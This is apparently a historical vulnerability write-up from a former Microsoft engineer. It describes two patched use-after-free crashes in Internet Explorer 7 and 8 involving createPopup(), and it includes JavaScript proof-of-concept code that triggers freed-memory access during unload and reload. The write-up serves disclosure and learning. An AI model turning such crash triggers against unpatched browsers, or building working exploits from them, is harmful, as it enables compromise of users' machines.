This entry contained two distinct crashes involving createPopup() and page lifecycle events. Both exploited the fact that hiding or focusing a popup at exactly the wrong moment during navigation caused the browser to dereference freed memory.

Crash 01 — IE7 and IE8

var wPop = window.open("popup.html");
var badPop = createPopup();

wPop.onload = function() { badPop.hide(); };
wPop.onunload = function() { wPop.focus(); };
badPop.show(0, 0, 10, 10);

Crash 02 — IE8

var badPop = window[0].createPopup();
badPop.document.body.innerHTML = "test";
badPop.show(0, 0, 100, 100);

setTimeout(function() { badPop.hide(); }, 1);
setTimeout("location.reload()", 200);

In both cases the popup object outlived the document context it was tied to. Calling hide() during an unload or after a reload tried to access an already-freed CDoc structure, producing access violations that were classified as PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.